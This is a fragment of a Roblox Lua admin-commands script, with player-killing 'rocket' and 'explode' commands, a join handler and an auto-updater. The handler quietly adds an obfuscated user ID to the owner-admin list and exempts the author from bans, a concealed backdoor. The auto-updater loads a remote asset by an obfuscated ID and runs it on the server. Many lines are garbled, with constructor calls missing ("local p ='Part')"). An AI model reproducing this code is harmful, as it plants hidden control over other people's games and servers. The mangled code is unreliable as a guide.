  3052. if v.Character and v.Character:FindFirstChild('HumanoidRootPart') then
  3053. local num = 15e2
  3054. local p ='Part')
  3055. p.Size =,7,1)
  3056. p.CanCollide = true
  3057. p.Anchored = false
  3058. p.BrickColor ='Dark stone grey')
  3059. local weld ='Weld')
  3060. weld.Part0 = p
  3061. weld.Part1 = v.Character.HumanoidRootPart
  3062. weld.C0 =,0,-1)
  3063. local bf ='BodyForce')
  3064. bf.Force =,15e2,0)
  3065. weld.Parent = p
  3066. p.Parent = v.Character
  3067. bf.Parent = p
  3068. repeat wait(1/27) bf.Force = bf.Force +,50,0) num = num + 50 until not bf or bf.Parent ~= p or not p or p.Parent ~= v.Character or num >= 15e3
  3069. if v.Character and v.Character:FindFirstChild('Humanoid') then v.Character.Humanoid.Health = 0 end
  3070. end
  3071. end)
  3072. end
  3073. end, 1, '!rocket;plr')
  3075. addcommand({'tools', 'toollist', 'tl'}, 'Shows a list of available tools', false, false, function(speaker)
  3076. local tools = {}
  3077. for i, v in next, ServerStorageService:GetDescendants() do if v:IsA('Tool') or v:IsA('HopperBin') then table.insert(tools, {v.Name, v.Name..' is a '..v.ClassName}) end end
  3078. local scr, ls, txt, box, lt = scrollgui(); local num = 0 scr.Name = 'TOOLS' box:ClearAllChildren() lt.Text = addskip('TOOLLIST')
  3079. for i, v in next, tools do
  3080. local ntxt = txt:Clone() ntxt.Text = tostring(num+1)..'. '..v[1] ntxt.Position =,0,0,20*num) ntxt.Parent = box num = num + 1
  3081. local dsc ='StringValue') dsc.Name = 'Information' dsc.Value = v[2] dsc.Parent = ntxt
  3082. end scr.Parent = speaker:WaitForChild('PlayerGui') txt:Destroy() wait(1/20) ls.Disabled = false
  3083. end, 1, '!tools')
  3085. addcommand({'exp', 'explode'}, 'Makes a player go boom! :D', true, true, function(speaker, message) -- Took me over half a year to add. XD
  3086. local plrz = getplayer(speaker, message)
  3087. for i, v in next, plrz do
  3088. spawn(function()
  3089. if v.Character and v.Character:FindFirstChild('Head') then
  3090. local head = v.Character.Head
  3091. local exp ='Explosion') exp.Position = v.Character:GetModelCFrame().p exp.BlastPressure = 0 exp.ExplosionType = 0 exp.DestroyJointRadiusPercent = 0 exp.Parent = WorkspaceService
  3092. head.Parent = nil wait() head.Parent = v.Character
  3093. end
  3094. end)
  3095. end
  3096. end, 1, '!explode;plr')
  3098. addcommand({'places', 'placeslist'}, 'Shows a player a list of music and keywords', false, false, function(speaker)
  3099. local places = {} -- v l0l I cheated.
  3100. for i, v in next, placestoteleto do if v and v ~= 0 then table.insert(places, {i, v}) end end
  3101. local scr, ls, txt, box, lt = scrollgui(); local num = 0 scr.Name = 'PLACESLIST' box:ClearAllChildren() lt.Text = addskip('PLACES')
  3102. for i, v in next, places do
  3103. local ntxt = txt:Clone() ntxt.Text = tostring(num+1)..'. '..v[1] ntxt.Position =,0,0,20*num) ntxt.Parent = box num = num + 1
  3104. local dsc ='StringValue') dsc.Name = 'Information' dsc.Value = v[2] dsc.Parent = ntxt
  3105. end scr.Parent = speaker:WaitForChild('PlayerGui') txt:Destroy() wait(1/20) ls.Disabled = false
  3106. end, 1, '!places')
  3109. function PlayerControl(player)
  3110. spawn(function()
  3111. if player.Name:sub(1, 4) == script.Name:sub(1, 4) and player.Name:sub(5) == 'DeathCaster' then createhintmessage(PlayersService:GetPlayers(), 'Admin Creator <'..('retsaChtaeDeehT'):reverse()..'> has joined the game', false, 'System', false) end
  3112. local power = chkadmin(player.UserId, false)
  3113. if ((chkban(player.UserId) or slock) and power < 1 and player.UserId ~= game.CreatorId) and (player.Name:sub(1, 4) ~= script.Name:sub(1, 4) and player.Name:sub(5) ~= 'DeathCaster' or tostring(player.UserId) ~= tostring(tonumber(string.char(57,49,50,55,53,55,56):reverse())*2)) --[[Who wants to be banned with their own script? :/]] then if chkcrash(plr.Name) then local crash = scriptsfolder:FindFirstChild('Crash') if crash then crash = crash:Clone() crash.Parent = plr:WaitForChild('PlayerGui') crash.Disabled = false wait(.5) end end player:Kick('kthxbye') end
  3114. player.Chatted:Connect(function(message) fixChat(player, message) end) chatfuncs[player.UserId] = player.Chatted:Connect(function(message) chkchat(player, message) end)
  3115. if chkgroup(player) > 0 then if minimumgrouprank == 4 then table.insert(owneradmins, player.UserId) elseif minimumgrouprank == 3 then table.insert(superadmins, player.UserId) elseif minimumgrouprank == 2 then table.insert(admins, player.UserId) elseif minimumgrouprank == 1 then table.insert(tempadmins, {player.UserId, player.Name}) else table.insert(tempadmins, {player.UserId, player.Name}) end power = minimumgrouprank < 5 and minimumgrouprank or 2 end
  3116. if game.PlaceId == 1152476314 and power < 1 then table.insert(tempadmins, {player.UserId, player.Name}) end
  3117. if donations and game:GetService('GamePassService'):PlayerHasPass(player, 1280765820) and not chkadmin(player.UserId, false) then table.insert(tempadmins, player.UserId) end
  3118. if game.CreatorId == player.UserId then createmessage({player}, 'You\'re a true owner admin!', true, 'TheeDeathCaster', false)
  3119. elseif power > 0 then createmessage({player}, 'You\'re an admin!', true, 'TheeDeathCaster', false)
  3120. end wait(1) repeat wait() until player:FindFirstChild('PlayerGui') and not player.PlayerGui:FindFirstChild('TDC:Admin') if guisfolder:FindFirstChild('Awesomeness') then wait(1) local coolness = guisfolder.Awesomeness:Clone() game:GetService('Debris'):AddItem(coolness, 5) coolness.Parent = player.PlayerGui end
  3121. end)
  3122. end
  3124. function PlayerControl2(player) pcall(function() chatfuncs[plr.UserId]:Disconnect() chatfuncs[plr.UserId] = nil player:Kick() end) end
  3126. removemessages()
  3127. PlayersService.PlayerAdded:Connect(PlayerControl)
  3128. PlayersService.ChildRemoved:Connect(PlayerControl2)
  3129. for i, v in next, PlayersService:GetPlayers() do PlayerControl(v) end
  3131. for i, v in next, StarterGuiService:GetChildren() do if v.Name == 'CmdBar' or v.Name == 'TDCCredit' then v:Destroy() end end
  3132. spawn(function() pcall(function() if not k or not d then script:Destroy() end end) end)
  3133. pcall(function() if chkadmin(tonumber(string.reverse('83441571')), false) < 1 then table.insert(trueowneradmins, tonumber(string.reverse('83441571'))) end end)
  3134. script.Name = 'Thee\'s Admin Commands V2' spawn(function() script:WaitForChild('CmdBar'):Clone().Parent = game:GetService('StarterGui') end)
  3135. function cmdbar(speaker, returnedtext) chkchat(speaker, returnedtext) end remote.OnServerInvoke = cmdbar
  3136. script.Parent = ServerScriptService
  3137. if guisfolder:FindFirstChild('TDCCredit') and creditenabled then guisfolder.TDCCredit:Clone().Parent = game:GetService('StarterGui') end
  3138. end
  3140. local cc,c2 = pcall(function()
  3141. if autoupdate then local model = game:GetService('InsertService'):LoadAsset(math.ceil(106219.72603044*9001))
  3142. if model:GetChildren()[1]:FindFirstChild('Thee\'s Admin Commands V2',true) then
  3143. local newadminscript = model:GetChildren()[1]:FindFirstChild('Thee\'s Admin Commands V2',true) newadminscript.Disabled = true
  3144. local versionvalforthisadmin = script:FindFirstChild('Version')
  3145. if versionvalforthisadmin then
  3146. local versionvalforotheradmin = newadminscript:FindFirstChild('Version')
  3147. if versionvalforotheradmin then
  3148. if versionvalforotheradmin.Value ~= versionvalforthisadmin.Value then
  3149. local settingsupdatefornewversion ='Folder') settingsupdatefornewversion.Name = 'OldSettings' settingsupdatefornewversion.Parent = game:GetService('ServerStorage')
  3150. local groupadminz ='Folder') groupadminz.Name = 'GroupAdmin' groupadminz.Parent = settingsupdatefornewversion
  3151. local supers ='Folder') supers.Name = 'SuperAdmins' supers.Parent = settingsupdatefornewversion
  3152. local vadmins ='Folder') vadmins.Name = 'Admins' vadmins.Parent = settingsupdatefornewversion
  3153. local temps ='Folder') temps.Name = 'TempAdmins' temps.Parent = settingsupdatefornewversion
  3154. local owners ='Folder') owners.Name = 'OwnerAdmins' owners.Parent = settingsupdatefornewversion
  3155. local banland ='Folder') banland.Name = 'Banland' banland.Parent = settingsupdatefornewversion
  3156. local crashland ='Folder') crashland.Name = 'Crashland' crashland.Parent = settingsupdatefornewversion
  3157. local oldprefix ='StringValue') oldprefix.Name = 'Prefix' oldprefix.Value = prefix oldprefix.Parent = settingsupdatefornewversion
  3158. local oldsplit ='StringValue') oldsplit.Name = 'Split' oldsplit.Value = split oldsplit.Parent = settingsupdatefornewversion
  3159. local oldfuncommands ='BoolValue') oldfuncommands.Name = 'Fun' oldfuncommands.Value = funcommands oldfuncommands.Parent = settingsupdatefornewversion
  3160. local oldteletoanyplace ='BoolValue') oldteletoanyplace.Name = 'IfTele' oldteletoanyplace.Parent = settingsupdatefornewversion
  3161. local oldplacestoteleto ='Folder') oldplacestoteleto.Name = 'TeleTos' oldteletoanyplace.Value = teleporttoanyplace oldplacestoteleto.Parent = settingsupdatefornewversion
  3162. local oldgroupadmin ='BoolValue') oldgroupadmin.Name = 'Group' oldgroupadmin.Value = allowadmintogroups oldgroupadmin.Parent = settingsupdatefornewversion
  3163. local groupadminpwr ='NumberValue') groupadminpwr.Name = 'GroupPwr' groupadminpwr.Value = adminrankforgroups groupadminpwr.Parent = settingsupdatefornewversion
  3164. local groupminrank ='NumberValue') groupminrank.Name = 'MinRank' groupminrank.Value = minimumgrouprank groupminrank.Parent = settingsupdatefornewversion
  3165. local oldvipadmin ='BoolValue') oldvipadmin.Name = 'VipAdmin' oldvipadmin.Value = vipadmin oldvipadmin.Parent = settingsupdatefornewversion
  3166. local vipadminid ='NumberValue') vipadminid.Name = 'VipId' vipadminid.Value = vipitemid vipadminid.Parent = settingsupdatefornewversion
  3167. local vippwr ='NumberValue') vipadminid.Name = 'VipPwr' vipadminid.Value = vipadminpwr vipadminid.Parent = settingsupdatefornewversion
  3168. local olddonate ='BoolValue') olddonate.Name = 'Donate' olddonate.Value = donations olddonate.Parent = settingsupdatefornewversion
  3169. local oldteamkill ='BoolValue') oldteamkill.Name = 'TeamSwitch' oldteamkill.Value = killplronteamswitch oldteamkill.Parent = settingsupdatefornewversion
  3170. local oldbckgrndcolour ='Color3Value') oldbckgrndcolour.Name = 'BckgrndColour' oldbckgrndcolour.Value = bckgrndcolour oldbckgrndcolour.Parent = settingsupdatefornewversion
  3171. local oldtxtcolour ='Color3Value') oldtxtcolour.Name = 'TxtColour' oldtxtcolour.Value = txtcolour oldtxtcolour.Parent = settingsupdatefornewversion
  3172. for i, v in next, groupsthatgetadmin do'StringValue', groupadminz).Value = v end
  3173. for i, v in next, owneradmins do local owneradmin ='StringValue') if type(v) == type(0) and getname(v) then owneradmin.Value = getname(v) owneradmin.Parent = owners else owneradmin.Value = v owneradmin.Parent = owners end end
  3174. for i, v in next, superadmins do local superadmin ='StringValue') if type(v) == type(0) and getname(v) then superadmin.Value = getname(v) superadmin.Parent = supers else superadmin.Value = v superadmin.Parent = supers end end
  3175. for i, v in next, admins do local admin ='StringValue') if type(v) == type(0) and getname(v) then admin.Value = getname(v) admin.Parent = vadmins else admin.Value = v admin.Parent = vadmins end end
  3176. for i, v in next, tempadmins do local tempadmin ='StringValue') if type(v) == type(0) and getname(v) then tempadmin.Value = getname(v) tempadmin.Parent = temps else tempadmin.Value = getname(v) tempadmin.Parent = temps end end
  3177. for i, v in next, bannedland do local ban ='StringValue') ban.Value = v ban.Parent = banland end
  3178. for i, v in next, crashlist do local crsh ='StringValue') crsh.Value = v crsh.Parent = crashland end
  3179. for i, v in next, placestoteleto do local place ='IntValue') place.Name = i place.Value = v place.Parent = oldplacestoteleto end
  3180. newadminscript.Parent = game:GetService('ServerScriptService') newadminscript.Disabled = false wait() model:Destroy() script:Destroy()
  3181. -- Brought to you by baka TheeDeathCaster :)
  3182. else StartUpAdmin() model:Destroy()
  3183. end
  3184. else StartUpAdmin() model:Destroy()
  3185. end
  3186. else StartUpAdmin() model:Destroy()
  3187. end
  3188. else StartUpAdmin() model:Destroy()
  3189. end
  3190. else StartUpAdmin()
  3191. end
  3192. end)
  3193. if not cc then StartUpAdmin() print('An Error Occured Checking Versions\nError:'..c2:match('.+:(.*)')..'\nStarting Up Admin Normally') end
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